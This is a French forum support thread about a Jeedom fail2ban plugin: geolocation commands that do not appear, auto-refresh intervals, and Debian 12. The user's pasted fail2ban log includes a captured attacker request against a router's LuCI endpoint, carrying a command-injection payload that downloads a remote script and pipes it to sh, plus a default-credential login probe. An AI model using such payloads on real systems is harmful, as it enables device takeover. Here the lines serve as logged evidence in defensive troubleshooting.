Accès ssh par certificat

Plugins
1

Bonjour

Merci pour ce plugin qui me remontent les informations de mes 2 fail2ban ( Jeedom et Nginx Proxy Manager).

1- J’ai un VPS sur lequel j’accède en ssh avec des certificats. Serait t’il possible dans l’avenir de proposer cette fonctionnalité.

2- Dans la documentation il est cité:

Chapitre 6) Les commandes
En plus de ces commandes, lors de chaque actualisation, si une nouvelle IP est bannie, le plugin fera une recherche de géolocalisation de l’adresse IP et créera une nouvelle commande par pays d’origine contenant le nombre de visite distincte (par adresse IP) (uniquement pour les adresses IP publiques)

Pourrais je avoir un éclaircissement sur « uniquement pour les adresses publiques ».

Cordialement

2

Bonjour,

  1. oui, c’est à l’étude
  2. les adresses publiques, pas les privés. Je ne sais pas trop quoi éclaircir j’avoue. plus d’info sur ce qu’est une adresse publique (ou privé) sur internet, ici par exemple: Adresse IP — Wikipédia ou ici: https://www.it-connect.fr/les-adresses-ip-privees-et-publiques/#IV_Les_adresses_IP_publiques
3

Merci pour le point 1.

Je prends par exemple les IP bannies de mon Jeedom :

13.42.58.96|128.199.102.188|157.230.19.140|178.128.207.138|185.195.232.134|213.232.87.230|45.148.10.172|13.212.110.223|109.205.213.230

Ce sont effectivement des adresses IP publiques.

Je me posais la question parce que je n’ai pas de commandes de géolocalisation créées dans mes 2 équipements.

Debian 12 plugin fail2ban version stable 2024-10-17 16:32:51.

4

Il faudrait regarder les logs, en mode INFO, pas besoin de DEBUG, lorsqu’une nouvelle ip est bloquée.

1 « J'aime »
5

Bonjour

J’ai une nouvelle adresse ip qui a été bannie mais rien dans le log positionné en info.
Je suis passé en log Debug. J’attend la prochaine ip bannie.

Cordialement

Edit: Je n’avais pas paramétré l’Auto-actualisation peut être lié à cela.

6

Ne pas mettre debug, laisser info.
Si je prend le temps de le spécifier c’est pas pour rien, après ca n’ira pas car trop de log.
Il doit y avoir un log info au minimum quoi qu’il arrive et il n’est pas possible de ne pas configurer d’auto-actualisation.

Ce n’est pas non plus pour rien que je demande de systématiquement fournir:

  • page santé jeedom
  • page config plugin et équipement
  • tous les logs

On gagnera du temps

7

Bonjour Mips

De nouvelles adresses IP ont été bannies, voici:
J’ai affiché l’équipement NginxManager sur lequel 1 seul jail est paramétré pour plus de simplicité.

La page santé :

image
image1842×421 72.6 KB

Configuration du plugin:
image
image1720×488 52.6 KB

Equipements:

image

Equipement Nginx Manager:

image
image1125×494 31.8 KB

Commandes de l’équipement Nginx Manager:
image
image1451×953 90.9 KB

image
image1165×451 40.5 KB

image
image446×668 28.5 KB

image
image1103×283 12.7 KB

Il n’y a pas eu d’autres messages après désactivation et réactivation du pluging le 21/12.

Fail2ban de Nginx Manager :

Part.1

2024-12-20 21:12:20,131 fail2ban.filter         [7803]: INFO    [npm-docker] Found 222.106.242.167 - 2024-12-20 21:12:20
2024-12-21 02:15:27,282 fail2ban.filter         [7803]: INFO    [npm-docker] Found 47.129.36.118 - 2024-12-21 02:15:27
2024-12-21 07:54:52,058 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,059 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,063 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,070 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,078 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,084 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,090 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,097 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,105 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,112 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,119 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,126 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,132 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,138 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,144 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,151 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,158 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,164 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,170 fail2ban.filter         [7803]: INFO    [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,329 fail2ban.actions        [7803]: NOTICE  [npm-docker] Ban 84.17.60.71
2024-12-21 12:59:58,858 fail2ban.filter         [7803]: INFO    [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:58
2024-12-21 12:59:59,213 fail2ban.filter         [7803]: INFO    [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:59
2024-12-21 12:59:59,510 fail2ban.filter         [7803]: INFO    [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:59
2024-12-21 12:59:59,754 fail2ban.filter         [7803]: INFO    [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:59
2024-12-21 12:59:59,908 fail2ban.actions        [7803]: NOTICE  [npm-docker] Ban 35.216.172.135
2024-12-21 15:28:19,374 fail2ban.filter         [7803]: INFO    [sshd] Found 192.168.1.132 - 2024-12-21 15:28:18
2024-12-21 18:05:13,705 fail2ban.filter         [7803]: INFO    [npm-docker] Found 180.76.184.14 - 2024-12-21 18:05:13
2024-12-21 18:32:06,660 fail2ban.filter         [7803]: WARNING [npm-docker] Detected a log entry 1h before the current time in operation mode. This looks like a timezone problem. Treating such entries as if they just happened.
2024-12-21 18:32:06,661 fail2ban.filter         [7803]: WARNING [npm-docker] Please check a jail for a timing issue. Line with odd timestamp: 2024/12/21 17:32:06 [error] 394#394: *93066 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 59.88.235.97, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0"
2024-12-21 22:48:53,508 fail2ban.filter         [7803]: INFO    [npm-docker] Found 54.234.30.149 - 2024-12-21 22:48:53

Part.2

2024-12-22 00:00:05,487 fail2ban.server         [7803]: INFO    rollover performed on /var/log/fail2ban.log
2024-12-22 13:20:52,368 fail2ban.actions        [7803]: NOTICE  [npm-docker] Unban 109.205.213.230
2024-12-22 15:10:19,822 fail2ban.filter         [7803]: INFO    [npm-docker] Found 157.245.78.27 - 2024-12-22 15:10:19
2024-12-22 16:47:14,737 fail2ban.filter         [7803]: INFO    [npm-docker] Found 172.105.246.139 - 2024-12-22 16:47:14
2024-12-22 16:47:15,439 fail2ban.filter         [7803]: INFO    [npm-docker] Found 172.105.246.139 - 2024-12-22 16:47:15
2024-12-22 16:47:17,253 fail2ban.filter         [7803]: INFO    [npm-docker] Found 172.105.246.139 - 2024-12-22 16:47:17
2024-12-22 16:47:17,359 fail2ban.actions        [7803]: NOTICE  [npm-docker] Ban 172.105.246.139
2024-12-22 17:43:41,063 fail2ban.filter         [7803]: INFO    [npm-docker] Found 198.7.125.59 - 2024-12-22 17:43:41
2024-12-22 18:48:40,026 fail2ban.filter         [7803]: WARNING [npm-docker] Detected a log entry 1h before the current time in operation mode. This looks like a timezone problem. Treating such entries as if they just happened.
2024-12-22 18:48:40,027 fail2ban.filter         [7803]: WARNING [npm-docker] Please check a jail for a timing issue. Line with odd timestamp: 2024/12/22 17:48:40 [error] 421#421: *113388 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 31.220.1.144, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1", host: "82.65.95.75:80"
2024-12-22 21:47:21,325 fail2ban.filter         [7803]: INFO    [npm-docker] Found 185.208.156.160 - 2024-12-22 21:47:20
2024-12-22 22:28:21,146 fail2ban.filter         [7803]: INFO    [npm-docker] Found 103.102.230.8 - 2024-12-22 22:28:21
2024-12-23 11:39:31,191 fail2ban.transmitter    [7803]: ERROR   Command ['npm-docker'] has failed. Received Exception('Invalid command')
2024-12-23 15:42:13,569 fail2ban.filter         [7803]: INFO    [npm-docker] Found 4.151.38.184 - 2024-12-23 15:42:13
2024-12-23 16:20:47,085 fail2ban.filter         [7803]: INFO    [npm-docker] Found 4.213.162.155 - 2024-12-23 16:20:47


root@NginxManager:/var/log# fail2ban-client status npm-docker
Status for the jail: npm-docker
|- Filter
|  |- Currently failed:	1
|  |- Total failed:	60
|  `- File list:	/home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-2_error.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-4_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-4_error.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-2_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-3_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-1_error.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-1_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-3_error.log /home/dom/docker/nginx-proxy-manager/data/logs/fallback_access.log /home/dom/docker/nginx-proxy-manager/data/logs/fallback_error.log
`- Actions
   |- Currently banned:	4
   |- Total banned:	5
   `- Banned IP list:	38.106.31.252 84.17.60.71 35.216.172.135 172.105.246.139
root@NginxManager:/var/log#

Remarque concernant la commande « Dernière IP bannie npm-docker »:
La dernière ip bannie dans le journal fail2ban.log est : 172.105.246.139.
L’ip bannie la plus vieille est : 38.106.31.252

A ta disposition pour d’autres compléments.

Cordialement

8

normal que ton auto-refresh soit une fois par heure?

je n’ai pas regarder plus en détail mais les chances que le jail soit libéré le temps que l’actualisation se fasse sont grandes

9

Bonjour Mips

Oui, avoir l’auto-refresh toutes les heures cela me convient.

J’ai installé le plugin sur mon Jeedom de test qui est en Debian 11 et j’obtiens bien :

image
image1876×334 41.5 KB

et la dernière ip bannie est :
image

image
image1276×70 7.04 KB

Sur mon Jeeedom en Debian 12:
image

image
image1241×70 6.95 KB

J’en déduis que mes problèmes sont liés à Debian 12.

Je te souhaite de bonnes fêtes.
Cordialement.

10

sauf que ca ne marchera pas comme tu veux si une ip n’est bannie que 15min par exemple, tu n’auras pas l’info qui remonte à temps sous jeedom (excepté si le ban a eu lieu dans le dernier quart d’heure)

je ne vois pas comment tu peux déduire ça: le fait que ca fonctionne sous deb11 ne veut pas dire que ca ne fonctionne pas sous deb12, il y a d’autres éléments à prendre en compte: config faite, a quel moment est faite l’actualisation…

le plugin fonctionne sous deb12, il tourne chez moi en // d’une instance sous deb11
et les infos remontent comme attendu exactement de la même façon donc si problème il y a c’est indépendant de la version de l’os;

11

Bonjour

J’ai repassé à 10 mn pour l’autorefresh.

Pour le reste j’en conviens cela doit être lié à mon installation Debian 12, je vais effacer le plugin et le réinstaller.

Cordialement